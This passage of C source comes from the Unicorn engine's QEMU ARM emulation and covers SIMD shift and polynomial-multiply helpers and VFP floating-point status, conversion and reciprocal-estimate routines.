extract32(desc, SIMD_DATA_SHIFT + 2, 3); int is_q = oprsz == 16; uint64_t n_4; float32 m_1; /* Pre-load all of the f16 data, avoiding overlap issues. */ n_4 = load4_f16(vn, is_q, is_2); /* Negate all inputs for FMLSL at once. */ if (is_s) { n_4 ^= 0x8000800080008000ull; } m_1 = float16_to_float32_by_bits(((float16 *)vm)[H2(index)], fz16); for (i = 0; i < oprsz / 4; i++) { float32 n_1 = float16_to_float32_by_bits(n_4 >> (i * 16), fz16); d[H4(i)] = float32_muladd(n_1, m_1, d[H4(i)], 0, fpst); } clear_tail(d, oprsz, simd_maxsz(desc)); } void HELPER(gvec_fmlal_idx_a32)(void *vd, void *vn, void *vm, void *venv, uint32_t desc) { CPUARMState *env = venv; do_fmlal_idx(vd, vn, vm, &env->vfp.standard_fp_status, desc, get_flush_inputs_to_zero(&env->vfp.fp_status_f16)); } void HELPER(gvec_fmlal_idx_a64)(void *vd, void *vn, void *vm, void *venv, uint32_t desc) { CPUARMState *env = venv; do_fmlal_idx(vd, vn, vm, &env->vfp.fp_status, desc, get_flush_inputs_to_zero(&env->vfp.fp_status_f16)); } void HELPER(gvec_sshl_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); int8_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; ++i) { int8_t mm = m[i]; int8_t nn = n[i]; int8_t res = 0; if (mm >= 0) { if (mm < 8) { res = nn << mm; } } else { res = nn >> (mm > -8 ? -mm : 7); } d[i] = res; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_sshl_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); int16_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz / 2; ++i) { int8_t mm = m[i]; /* only 8 bits of shift are significant */ int16_t nn = n[i]; int16_t res = 0; if (mm >= 0) { if (mm < 16) { res = nn << mm; } } else { res = nn >> (mm > -16 ? 
-mm : 15); } d[i] = res; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_ushl_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint8_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz; ++i) { int8_t mm = m[i]; uint8_t nn = n[i]; uint8_t res = 0; if (mm >= 0) { if (mm < 8) { res = nn << mm; } } else { if (mm > -8) { res = nn >> -mm; } } d[i] = res; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_ushl_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint16_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz / 2; ++i) { int8_t mm = m[i]; /* only 8 bits of shift are significant */ uint16_t nn = n[i]; uint16_t res = 0; if (mm >= 0) { if (mm < 16) { res = nn << mm; } } else { if (mm > -16) { res = nn >> -mm; } } d[i] = res; } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* * 8x8->8 polynomial multiply. * * Polynomial multiplication is like integer multiplication except the * partial products are XORed, not added. * * TODO: expose this as a generic vector operation, as it is a common * crypto building block. */ void HELPER(gvec_pmul_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc); uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz / 8; ++i) { uint64_t nn = n[i]; uint64_t mm = m[i]; uint64_t rr = 0; for (j = 0; j < 8; ++j) { uint64_t mask = (nn & 0x0101010101010101ull) * 0xff; rr ^= mm & mask; mm = (mm << 1) & 0xfefefefefefefefeull; nn >>= 1; } d[i] = rr; } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* * 64x64->128 polynomial multiply. * Because of the lanes are not accessed in strict columns, * this probably cannot be turned into a generic helper. */ void HELPER(gvec_pmull_q)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, j, opr_sz = simd_oprsz(desc); intptr_t hi = simd_data(desc); uint64_t *d = vd, *n = vn, *m = vm; for (i = 0; i < opr_sz / 8; i += 2) { uint64_t nn = n[i + hi]; uint64_t mm = m[i + hi]; uint64_t rhi = 0; uint64_t rlo = 0; /* Bit 0 can only influence the low 64-bit result. */ if (nn & 1) { rlo = mm; } for (j = 1; j < 64; ++j) { #ifdef _MSC_VER uint64_t mask = 0 - ((nn >> j) & 1); #else uint64_t mask = -((nn >> j) & 1); #endif rlo ^= (mm << j) & mask; rhi ^= (mm >> (64 - j)) & mask; } d[i] = rlo; d[i + 1] = rhi; } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* * 8x8->16 polynomial multiply. * * The byte inputs are expanded to (or extracted from) half-words. * Note that neon and sve2 get the inputs from different positions. * This allows 4 bytes to be processed in parallel with uint64_t. 
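 * Worked example of a carry-less multiply: 0b0101 x 0b0011 =
 * (0b0101 << 0) ^ (0b0101 << 1) = 0b0101 ^ 0b1010 = 0b1111; the shifted
 * partial products are combined with XOR, so no carries propagate.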
 */
static uint64_t expand_byte_to_half(uint64_t x)
{
    return (x & 0x000000ff)
         | ((x & 0x0000ff00) << 8)
         | ((x & 0x00ff0000) << 16)
         | ((x & 0xff000000) << 24);
}

static uint64_t pmull_h(uint64_t op1, uint64_t op2)
{
    uint64_t result = 0;
    int i;

    for (i = 0; i < 8; ++i) {
        uint64_t mask = (op1 & 0x0001000100010001ull) * 0xffff;
        result ^= op2 & mask;
        op1 >>= 1;
        op2 <<= 1;
    }
    return result;
}

void HELPER(neon_pmull_h)(void *vd, void *vn, void *vm, uint32_t desc)
{
    int hi = simd_data(desc);
    uint64_t *d = vd, *n = vn, *m = vm;
    uint64_t nn = n[hi], mm = m[hi];

    d[0] = pmull_h(expand_byte_to_half(nn), expand_byte_to_half(mm));
    nn >>= 32;
    mm >>= 32;
    d[1] = pmull_h(expand_byte_to_half(nn), expand_byte_to_half(mm));

    clear_tail(d, 16, simd_maxsz(desc));
}

#ifdef TARGET_AARCH64
void HELPER(sve2_pmull_h)(void *vd, void *vn, void *vm, uint32_t desc)
{
    int shift = simd_data(desc) * 8;
    intptr_t i, opr_sz = simd_oprsz(desc);
    uint64_t *d = vd, *n = vn, *m = vm;

    for (i = 0; i < opr_sz / 8; ++i) {
        uint64_t nn = (n[i] >> shift) & 0x00ff00ff00ff00ffull;
        uint64_t mm = (m[i] >> shift) & 0x00ff00ff00ff00ffull;

        d[i] = pmull_h(nn, mm);
    }
}
#endif
unicorn-2.1.1/qemu/target/arm/vfp_helper.c
/*
 * ARM VFP floating-point operations
 *
 * Copyright (c) 2003 Fabrice Bellard
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/helper-proto.h"
#include "internals.h"
#include "qemu/log.h"
#include "fpu/softfloat.h"

/* VFP support.  We follow the convention used for VFP instructions:
   Single precision routines have a "s" suffix, double precision a
   "d" suffix.  */

/* Convert host exception flags to vfp form. */
static inline int vfp_exceptbits_from_host(int host_bits)
{
    int target_bits = 0;

    if (host_bits & float_flag_invalid) {
        target_bits |= 1;
    }
    if (host_bits & float_flag_divbyzero) {
        target_bits |= 2;
    }
    if (host_bits & float_flag_overflow) {
        target_bits |= 4;
    }
    if (host_bits & (float_flag_underflow | float_flag_output_denormal)) {
        target_bits |= 8;
    }
    if (host_bits & float_flag_inexact) {
        target_bits |= 0x10;
    }
    if (host_bits & float_flag_input_denormal) {
        target_bits |= 0x80;
    }
    return target_bits;
}

/* Convert vfp exception flags to target form.
*/ static inline int vfp_exceptbits_to_host(int target_bits) { int host_bits = 0; if (target_bits & 1) { host_bits |= float_flag_invalid; } if (target_bits & 2) { host_bits |= float_flag_divbyzero; } if (target_bits & 4) { host_bits |= float_flag_overflow; } if (target_bits & 8) { host_bits |= float_flag_underflow; } if (target_bits & 0x10) { host_bits |= float_flag_inexact; } if (target_bits & 0x80) { host_bits |= float_flag_input_denormal; } return host_bits; } static uint32_t vfp_get_fpscr_from_host(CPUARMState *env) { uint32_t i; i = get_float_exception_flags(&env->vfp.fp_status); i |= get_float_exception_flags(&env->vfp.standard_fp_status); /* FZ16 does not generate an input denormal exception. */ i |= (get_float_exception_flags(&env->vfp.fp_status_f16) & ~float_flag_input_denormal); return vfp_exceptbits_from_host(i); } static void vfp_set_fpscr_to_host(CPUARMState *env, uint32_t val) { int i; uint32_t changed = env->vfp.xregs[ARM_VFP_FPSCR]; changed ^= val; if (changed & (3 << 22)) { i = (val >> 22) & 3; switch (i) { case FPROUNDING_TIEEVEN: i = float_round_nearest_even; break; case FPROUNDING_POSINF: i = float_round_up; break; case FPROUNDING_NEGINF: i = float_round_down; break; case FPROUNDING_ZERO: i = float_round_to_zero; break; } set_float_rounding_mode(i, &env->vfp.fp_status); set_float_rounding_mode(i, &env->vfp.fp_status_f16); } if (changed & FPCR_FZ16) { bool ftz_enabled = val & FPCR_FZ16; set_flush_to_zero(ftz_enabled, &env->vfp.fp_status_f16); set_flush_inputs_to_zero(ftz_enabled, &env->vfp.fp_status_f16); } if (changed & FPCR_FZ) { bool ftz_enabled = val & FPCR_FZ; set_flush_to_zero(ftz_enabled, &env->vfp.fp_status); set_flush_inputs_to_zero(ftz_enabled, &env->vfp.fp_status); } if (changed & FPCR_DN) { bool dnan_enabled = val & FPCR_DN; set_default_nan_mode(dnan_enabled, &env->vfp.fp_status); set_default_nan_mode(dnan_enabled, &env->vfp.fp_status_f16); } /* * The exception flags are ORed together when we read fpscr so we * only need to preserve the current state in one of our * float_status values. */ i = vfp_exceptbits_to_host(val); set_float_exception_flags(i, &env->vfp.fp_status); set_float_exception_flags(0, &env->vfp.fp_status_f16); set_float_exception_flags(0, &env->vfp.standard_fp_status); } uint32_t HELPER(vfp_get_fpscr)(CPUARMState *env) { uint32_t i, fpscr; fpscr = env->vfp.xregs[ARM_VFP_FPSCR] | (env->vfp.vec_len << 16) | (env->vfp.vec_stride << 20); fpscr |= vfp_get_fpscr_from_host(env); i = env->vfp.qc[0] | env->vfp.qc[1] | env->vfp.qc[2] | env->vfp.qc[3]; fpscr |= i ? FPCR_QC : 0; return fpscr; } uint32_t vfp_get_fpscr(CPUARMState *env) { return HELPER(vfp_get_fpscr)(env); } void HELPER(vfp_set_fpscr)(CPUARMState *env, uint32_t val) { /* When ARMv8.2-FP16 is not supported, FZ16 is RES0. */ if (!cpu_isar_feature(any_fp16, env_archcpu(env))) { val &= ~FPCR_FZ16; } if (arm_feature(env, ARM_FEATURE_M)) { /* * M profile FPSCR is RES0 for the QC, STRIDE, FZ16, LEN bits * and also for the trapped-exception-handling bits IxE. */ val &= 0xf7c0009f; } vfp_set_fpscr_to_host(env, val); /* * We don't implement trapped exception handling, so the * trap enable bits, IDE|IXE|UFE|OFE|DZE|IOE are all RAZ/WI (not RES0!) * * If we exclude the exception flags, IOC|DZC|OFC|UFC|IXC|IDC * (which are stored in fp_status), and the other RES0 bits * in between, then we clear all of the low 16 bits. 
*/ env->vfp.xregs[ARM_VFP_FPSCR] = val & 0xf7c80000; env->vfp.vec_len = (val >> 16) & 7; env->vfp.vec_stride = (val >> 20) & 3; /* * The bit we set within fpscr_q is arbitrary; the register as a * whole being zero/non-zero is what counts. */ env->vfp.qc[0] = val & FPCR_QC; env->vfp.qc[1] = 0; env->vfp.qc[2] = 0; env->vfp.qc[3] = 0; } void vfp_set_fpscr(CPUARMState *env, uint32_t val) { HELPER(vfp_set_fpscr)(env, val); } #define VFP_HELPER(name, p) HELPER(glue(glue(vfp_,name),p)) #define VFP_BINOP(name) \ float32 VFP_HELPER(name, s)(float32 a, float32 b, void *fpstp) \ { \ float_status *fpst = fpstp; \ return float32_ ## name(a, b, fpst); \ } \ float64 VFP_HELPER(name, d)(float64 a, float64 b, void *fpstp) \ { \ float_status *fpst = fpstp; \ return float64_ ## name(a, b, fpst); \ } VFP_BINOP(add) VFP_BINOP(sub) VFP_BINOP(mul) VFP_BINOP(div) VFP_BINOP(min) VFP_BINOP(max) VFP_BINOP(minnum) VFP_BINOP(maxnum) #undef VFP_BINOP float32 VFP_HELPER(neg, s)(float32 a) { return float32_chs(a); } float64 VFP_HELPER(neg, d)(float64 a) { return float64_chs(a); } float32 VFP_HELPER(abs, s)(float32 a) { return float32_abs(a); } float64 VFP_HELPER(abs, d)(float64 a) { return float64_abs(a); } float32 VFP_HELPER(sqrt, s)(float32 a, CPUARMState *env) { return float32_sqrt(a, &env->vfp.fp_status); } float64 VFP_HELPER(sqrt, d)(float64 a, CPUARMState *env) { return float64_sqrt(a, &env->vfp.fp_status); } static void softfloat_to_vfp_compare(CPUARMState *env, int cmp) { uint32_t flags = 0; switch (cmp) { case float_relation_equal: flags = 0x6; break; case float_relation_less: flags = 0x8; break; case float_relation_greater: flags = 0x2; break; case float_relation_unordered: flags = 0x3; break; default: g_assert_not_reached(); break; } env->vfp.xregs[ARM_VFP_FPSCR] = deposit32(env->vfp.xregs[ARM_VFP_FPSCR], 28, 4, flags); } /* XXX: check quiet/signaling case */ #define DO_VFP_cmp(p, type) \ void VFP_HELPER(cmp, p)(type a, type b, CPUARMState *env) \ { \ softfloat_to_vfp_compare(env, \ type ## _compare_quiet(a, b, &env->vfp.fp_status)); \ } \ void VFP_HELPER(cmpe, p)(type a, type b, CPUARMState *env) \ { \ softfloat_to_vfp_compare(env, \ type ## _compare(a, b, &env->vfp.fp_status)); \ } DO_VFP_cmp(s, float32) DO_VFP_cmp(d, float64) #undef DO_VFP_cmp /* Integer to float and float to integer conversions */ #define CONV_ITOF(name, ftype, fsz, sign) \ ftype HELPER(name)(uint32_t x, void *fpstp) \ { \ float_status *fpst = fpstp; \ return sign##int32_to_##float##fsz((sign##int32_t)x, fpst); \ } #define CONV_FTOI(name, ftype, fsz, sign, round) \ sign##int32_t HELPER(name)(ftype x, void *fpstp) \ { \ float_status *fpst = fpstp; \ if (float##fsz##_is_any_nan(x)) { \ float_raise(float_flag_invalid, fpst); \ return 0; \ } \ return float##fsz##_to_##sign##int32##round(x, fpst); \ } #define FLOAT_CONVS(name, p, ftype, fsz, sign) \ CONV_ITOF(vfp_##name##to##p, ftype, fsz, sign) \ CONV_FTOI(vfp_to##name##p, ftype, fsz, sign, ) \ CONV_FTOI(vfp_to##name##z##p, ftype, fsz, sign, _round_to_zero) FLOAT_CONVS(si, h, uint32_t, 16, ) FLOAT_CONVS(si, s, float32, 32, ) FLOAT_CONVS(si, d, float64, 64, ) FLOAT_CONVS(ui, h, uint32_t, 16, u) FLOAT_CONVS(ui, s, float32, 32, u) FLOAT_CONVS(ui, d, float64, 64, u) #undef CONV_ITOF #undef CONV_FTOI #undef FLOAT_CONVS /* floating point conversion */ float64 VFP_HELPER(fcvtd, s)(float32 x, CPUARMState *env) { return float32_to_float64(x, &env->vfp.fp_status); } float32 VFP_HELPER(fcvts, d)(float64 x, CPUARMState *env) { return float64_to_float32(x, &env->vfp.fp_status); } /* VFP3 fixed point 
conversion. */ #ifdef _MSC_VER #define VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \ float##fsz HELPER(vfp_##name##to##p)(uint##isz##_t x, uint32_t shift, \ void *fpstp) \ { return itype##_to_##float##fsz##_scalbn(x, 0 - shift, fpstp); } #else #define VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \ float##fsz HELPER(vfp_##name##to##p)(uint##isz##_t x, uint32_t shift, \ void *fpstp) \ { return itype##_to_##float##fsz##_scalbn(x, -shift, fpstp); } #endif #define VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, ROUND, suff) \ uint##isz##_t HELPER(vfp_to##name##p##suff)(float##fsz x, uint32_t shift, \ void *fpst) \ { \ if (unlikely(float##fsz##_is_any_nan(x))) { \ float_raise(float_flag_invalid, fpst); \ return 0; \ } \ return float##fsz##_to_##itype##_scalbn(x, ROUND, shift, fpst); \ } #define VFP_CONV_FIX(name, p, fsz, isz, itype) \ VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \ VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, \ float_round_to_zero, _round_to_zero) \ VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, \ get_float_rounding_mode(fpst), ) #define VFP_CONV_FIX_A64(name, p, fsz, isz, itype) \ VFP_CONV_FIX_FLOAT(name, p, fsz, isz, itype) \ VFP_CONV_FLOAT_FIX_ROUND(name, p, fsz, isz, itype, \ get_float_rounding_mode(fpst), ) VFP_CONV_FIX(sh, d, 64, 64, int16) VFP_CONV_FIX(sl, d, 64, 64, int32) VFP_CONV_FIX_A64(sq, d, 64, 64, int64) VFP_CONV_FIX(uh, d, 64, 64, uint16) VFP_CONV_FIX(ul, d, 64, 64, uint32) VFP_CONV_FIX_A64(uq, d, 64, 64, uint64) VFP_CONV_FIX(sh, s, 32, 32, int16) VFP_CONV_FIX(sl, s, 32, 32, int32) VFP_CONV_FIX_A64(sq, s, 32, 64, int64) VFP_CONV_FIX(uh, s, 32, 32, uint16) VFP_CONV_FIX(ul, s, 32, 32, uint32) VFP_CONV_FIX_A64(uq, s, 32, 64, uint64) #undef VFP_CONV_FIX #undef VFP_CONV_FIX_FLOAT #undef VFP_CONV_FLOAT_FIX_ROUND #undef VFP_CONV_FIX_A64 uint32_t HELPER(vfp_sltoh)(uint32_t x, uint32_t shift, void *fpst) { #ifdef _MSC_VER return int32_to_float16_scalbn(x, 0 - shift, fpst); #else return int32_to_float16_scalbn(x, -shift, fpst); #endif } uint32_t HELPER(vfp_ultoh)(uint32_t x, uint32_t shift, void *fpst) { #ifdef _MSC_VER return uint32_to_float16_scalbn(x, 0 - shift, fpst); #else return uint32_to_float16_scalbn(x, -shift, fpst); #endif } uint32_t HELPER(vfp_sqtoh)(uint64_t x, uint32_t shift, void *fpst) { #ifdef _MSC_VER return int64_to_float16_scalbn(x, 0 - shift, fpst); #else return int64_to_float16_scalbn(x, -shift, fpst); #endif } uint32_t HELPER(vfp_uqtoh)(uint64_t x, uint32_t shift, void *fpst) { #ifdef _MSC_VER return uint64_to_float16_scalbn(x, 0 - shift, fpst); #else return uint64_to_float16_scalbn(x, -shift, fpst); #endif } uint32_t HELPER(vfp_toshh)(uint32_t x, uint32_t shift, void *fpst) { if (unlikely(float16_is_any_nan(x))) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_int16_scalbn(x, get_float_rounding_mode(fpst), shift, fpst); } uint32_t HELPER(vfp_touhh)(uint32_t x, uint32_t shift, void *fpst) { if (unlikely(float16_is_any_nan(x))) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_uint16_scalbn(x, get_float_rounding_mode(fpst), shift, fpst); } uint32_t HELPER(vfp_toslh)(uint32_t x, uint32_t shift, void *fpst) { if (unlikely(float16_is_any_nan(x))) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_int32_scalbn(x, get_float_rounding_mode(fpst), shift, fpst); } uint32_t HELPER(vfp_toulh)(uint32_t x, uint32_t shift, void *fpst) { if (unlikely(float16_is_any_nan(x))) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_uint32_scalbn(x, get_float_rounding_mode(fpst), 
shift, fpst); } uint64_t HELPER(vfp_tosqh)(uint32_t x, uint32_t shift, void *fpst) { if (unlikely(float16_is_any_nan(x))) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_int64_scalbn(x, get_float_rounding_mode(fpst), shift, fpst); } uint64_t HELPER(vfp_touqh)(uint32_t x, uint32_t shift, void *fpst) { if (unlikely(float16_is_any_nan(x))) { float_raise(float_flag_invalid, fpst); return 0; } return float16_to_uint64_scalbn(x, get_float_rounding_mode(fpst), shift, fpst); } /* Set the current fp rounding mode and return the old one. * The argument is a softfloat float_round_ value. */ uint32_t HELPER(set_rmode)(uint32_t rmode, void *fpstp) { float_status *fp_status = fpstp; uint32_t prev_rmode = get_float_rounding_mode(fp_status); set_float_rounding_mode(rmode, fp_status); return prev_rmode; } /* Set the current fp rounding mode in the standard fp status and return * the old one. This is for NEON instructions that need to change the * rounding mode but wish to use the standard FPSCR values for everything * else. Always set the rounding mode back to the correct value after * modifying it. * The argument is a softfloat float_round_ value. */ uint32_t HELPER(set_neon_rmode)(uint32_t rmode, CPUARMState *env) { float_status *fp_status = &env->vfp.standard_fp_status; uint32_t prev_rmode = get_float_rounding_mode(fp_status); set_float_rounding_mode(rmode, fp_status); return prev_rmode; } /* Half precision conversions. */ float32 HELPER(vfp_fcvt_f16_to_f32)(uint32_t a, void *fpstp, uint32_t ahp_mode) { /* Squash FZ16 to 0 for the duration of conversion. In this case, * it would affect flushing input denormals. */ float_status *fpst = fpstp; flag save = get_flush_inputs_to_zero(fpst); set_flush_inputs_to_zero(false, fpst); float32 r = float16_to_float32(a, !ahp_mode, fpst); set_flush_inputs_to_zero(save, fpst); return r; } uint32_t HELPER(vfp_fcvt_f32_to_f16)(float32 a, void *fpstp, uint32_t ahp_mode) { /* Squash FZ16 to 0 for the duration of conversion. In this case, * it would affect flushing output denormals. */ float_status *fpst = fpstp; flag save = get_flush_to_zero(fpst); set_flush_to_zero(false, fpst); float16 r = float32_to_float16(a, !ahp_mode, fpst); set_flush_to_zero(save, fpst); return r; } float64 HELPER(vfp_fcvt_f16_to_f64)(uint32_t a, void *fpstp, uint32_t ahp_mode) { /* Squash FZ16 to 0 for the duration of conversion. In this case, * it would affect flushing input denormals. */ float_status *fpst = fpstp; flag save = get_flush_inputs_to_zero(fpst); set_flush_inputs_to_zero(false, fpst); float64 r = float16_to_float64(a, !ahp_mode, fpst); set_flush_inputs_to_zero(save, fpst); return r; } uint32_t HELPER(vfp_fcvt_f64_to_f16)(float64 a, void *fpstp, uint32_t ahp_mode) { /* Squash FZ16 to 0 for the duration of conversion. In this case, * it would affect flushing output denormals. 
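 * (As with the other fcvt helpers above, this reflects the FPConvert
 * pseudocode: FZ16 flushing is defined not to apply to conversions
 * between half precision and the other formats.)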
*/ float_status *fpst = fpstp; flag save = get_flush_to_zero(fpst); set_flush_to_zero(false, fpst); float16 r = float64_to_float16(a, !ahp_mode, fpst); set_flush_to_zero(save, fpst); return r; } #define float32_two make_float32(0x40000000) #define float32_three make_float32(0x40400000) #define float32_one_point_five make_float32(0x3fc00000) float32 HELPER(recps_f32)(float32 a, float32 b, CPUARMState *env) { float_status *s = &env->vfp.standard_fp_status; if ((float32_is_infinity(a) && float32_is_zero_or_denormal(b)) || (float32_is_infinity(b) && float32_is_zero_or_denormal(a))) { if (!(float32_is_zero(a) || float32_is_zero(b))) { float_raise(float_flag_input_denormal, s); } return float32_two; } return float32_sub(float32_two, float32_mul(a, b, s), s); } float32 HELPER(rsqrts_f32)(float32 a, float32 b, CPUARMState *env) { float_status *s = &env->vfp.standard_fp_status; float32 product; if ((float32_is_infinity(a) && float32_is_zero_or_denormal(b)) || (float32_is_infinity(b) && float32_is_zero_or_denormal(a))) { if (!(float32_is_zero(a) || float32_is_zero(b))) { float_raise(float_flag_input_denormal, s); } return float32_one_point_five; } product = float32_mul(a, b, s); return float32_div(float32_sub(float32_three, product, s), float32_two, s); } /* NEON helpers. */ /* Constants 256 and 512 are used in some helpers; we avoid relying on * int->float conversions at run-time. */ #define float64_256 make_float64(0x4070000000000000LL) #define float64_512 make_float64(0x4080000000000000LL) #define float16_maxnorm make_float16(0x7bff) #define float32_maxnorm make_float32(0x7f7fffff) #define float64_maxnorm make_float64(0x7fefffffffffffffLL) /* Reciprocal functions * * The algorithm that must be used to calculate the estimate * is specified by the ARM ARM, see FPRecipEstimate()/RecipEstimate */ /* See RecipEstimate() * * input is a 9 bit fixed point number * input range 256 .. 511 for a number from 0.5 <= x < 1.0. * result range 256 .. 511 for a number from 1.0 to 511/256. */ static int recip_estimate(int input) { int a, b, r; assert(256 <= input && input < 512); a = (input * 2) + 1; b = (1 << 19) / a; r = (b + 1) >> 1; assert(256 <= r && r < 512); return r; } /* * Common wrapper to call recip_estimate * * The parameters are exponent and 64 bit fraction (without implicit * bit) where the binary point is nominally at bit 52. Returns a * float64 which can then be rounded to the appropriate size by the * callee. 
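 *
 * As a sanity check on recip_estimate() above: an input of 256
 * (representing 0.5) yields 511 (~1.996), and an input of 511
 * (~0.998) yields 256 (~1.0).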
*/ static uint64_t call_recip_estimate(int *exp, int exp_off, uint64_t frac) { uint32_t scaled, estimate; uint64_t result_frac; int result_exp; /* Handle sub-normals */ if (*exp == 0) { if (extract64(frac, 51, 1) == 0) { *exp = -1; frac <<= 2; } else { frac <<= 1; } } /* scaled = UInt('1':fraction<51:44>) */ scaled = deposit32(1 << 8, 0, 8, extract64(frac, 44, 8)); estimate = recip_estimate(scaled); result_exp = exp_off - *exp; result_frac = deposit64(0, 44, 8, estimate); if (result_exp == 0) { result_frac = deposit64(result_frac >> 1, 51, 1, 1); } else if (result_exp == -1) { result_frac = deposit64(result_frac >> 2, 50, 2, 1); result_exp = 0; } *exp = result_exp; return result_frac; } static bool round_to_inf(float_status *fpst, bool sign_bit) { switch (fpst->float_rounding_mode) { case float_round_nearest_even: /* Round to Nearest */ return true; case float_round_up: /* Round to +Inf */ return !sign_bit; case float_round_down: /* Round to -Inf */ return sign_bit; case float_round_to_zero: /* Round to Zero */ return false; } g_assert_not_reached(); // never reach here return false; } uint32_t HELPER(recpe_f16)(uint32_t input, void *fpstp) { float_status *fpst = fpstp; float16 f16 = float16_squash_input_denormal(input, fpst); uint32_t f16_val = float16_val(f16); uint32_t f16_sign = float16_is_neg(f16); int f16_exp = extract32(f16_val, 10, 5); uint32_t f16_frac = extract32(f16_val, 0, 10); uint64_t f64_frac; if (float16_is_any_nan(f16)) { float16 nan = f16; if (float16_is_signaling_nan(f16, fpst)) { float_raise(float_flag_invalid, fpst); nan = float16_silence_nan(f16, fpst); } if (fpst->default_nan_mode) { nan = float16_default_nan(fpst); } return nan; } else if (float16_is_infinity(f16)) { return float16_set_sign(float16_zero, float16_is_neg(f16)); } else if (float16_is_zero(f16)) { float_raise(float_flag_divbyzero, fpst); return float16_set_sign(float16_infinity, float16_is_neg(f16)); } else if (float16_abs(f16) < (1 << 8)) { /* Abs(value) < 2.0^-16 */ float_raise(float_flag_overflow | float_flag_inexact, fpst); if (round_to_inf(fpst, f16_sign)) { return float16_set_sign(float16_infinity, f16_sign); } else { return float16_set_sign(float16_maxnorm, f16_sign); } } else if (f16_exp >= 29 && fpst->flush_to_zero) { float_raise(float_flag_underflow, fpst); return float16_set_sign(float16_zero, float16_is_neg(f16)); } f64_frac = call_recip_estimate(&f16_exp, 29, ((uint64_t) f16_frac) << (52 - 10)); /* result = sign : result_exp<4:0> : fraction<51:42> */ f16_val = deposit32(0, 15, 1, f16_sign); f16_val = deposit32(f16_val, 10, 5, f16_exp); f16_val = deposit32(f16_val, 0, 10, extract64(f64_frac, 52 - 10, 10)); return make_float16(f16_val); } float32 HELPER(recpe_f32)(float32 input, void *fpstp) { float_status *fpst = fpstp; float32 f32 = float32_squash_input_denormal(input, fpst); uint32_t f32_val = float32_val(f32); bool f32_sign = float32_is_neg(f32); int f32_exp = extract32(f32_val, 23, 8); uint32_t f32_frac = extract32(f32_val, 0, 23); uint64_t f64_frac; if (float32_is_any_nan(f32)) { float32 nan = f32; if (float32_is_signaling_nan(f32, fpst)) { float_raise(float_flag_invalid, fpst); nan = float32_silence_nan(f32, fpst); } if (fpst->default_nan_mode) { nan = float32_default_nan(fpst); } return nan; } else if (float32_is_infinity(f32)) { return float32_set_sign(float32_zero, float32_is_neg(f32)); } else if (float32_is_zero(f32)) { float_raise(float_flag_divbyzero, fpst); return float32_set_sign(float32_infinity, float32_is_neg(f32)); } else if (float32_abs(f32) < (1ULL << 21)) { /* Abs(value) 
< 2.0^-128 */ float_raise(float_flag_overflow | float_flag_inexact, fpst); if (round_to_inf(fpst, f32_sign)) { return float32_set_sign(float32_infinity, f32_sign); } else { return float32_set_sign(float32_maxnorm, f32_sign); } } else if (f32_exp >= 253 && fpst->flush_to_zero) { float_raise(float_flag_underflow, fpst); return float32_set_sign(float32_zero, float32_is_neg(f32)); } f64_frac = call_recip_estimate(&f32_exp, 253, ((uint64_t) f32_frac) << (52 - 23)); /* result = sign : result_exp<7:0> : fraction<51:29> */ f32_val = deposit32(0, 31, 1, f32_sign); f32_val = deposit32(f32_val, 23, 8, f32_exp); f32_val = deposit32(f32_val, 0, 23, extract64(f64_frac, 52 - 23, 23)); return make_float32(f32_val); } float64 HELPER(recpe_f64)(float64 input, void *fpstp) { float_status *fpst = fpstp; float64 f64 = float64_squash_input_denormal(input, fpst); uint64_t f64_val = float64_val(f64); bool f64_sign = float64_is_neg(f64); int f64_exp = extract64(f64_val, 52, 11); uint64_t f64_frac = extract64(f64_val, 0, 52); /* Deal with any special cases */ if (float64_is_any_nan(f64)) { float64 nan = f64; if (float64_is_signaling_nan(f64, fpst)) { float_raise(float_flag_invalid, fpst); nan = float64_silence_nan(f64, fpst); } if (fpst->default_nan_mode) { nan = float64_default_nan(fpst); } return nan; } else if (float64_is_infinity(f64)) { return float64_set_sign(float64_zero, float64_is_neg(f64)); } else if (float64_is_zero(f64)) { float_raise(float_flag_divbyzero, fpst); return float64_set_sign(float64_infinity, float64_is_neg(f64)); } else if ((f64_val & ~(1ULL << 63)) < (1ULL << 50)) { /* Abs(value) < 2.0^-1024 */ float_raise(float_flag_overflow | 